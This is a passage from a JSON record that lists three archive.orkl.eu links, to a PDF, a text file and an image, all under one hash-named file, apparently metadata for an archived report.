		"pdf": "https://archive.orkl.eu/b55a1b9004afc876f13ea36c12dd298dbffdf83d.pdf",
		"text": "https://archive.orkl.eu/b55a1b9004afc876f13ea36c12dd298dbffdf83d.txt",
		"img": "https://archive.orkl.eu/b55a1b9004afc876f13ea36c12dd298dbffdf83d.jpg"
	}
}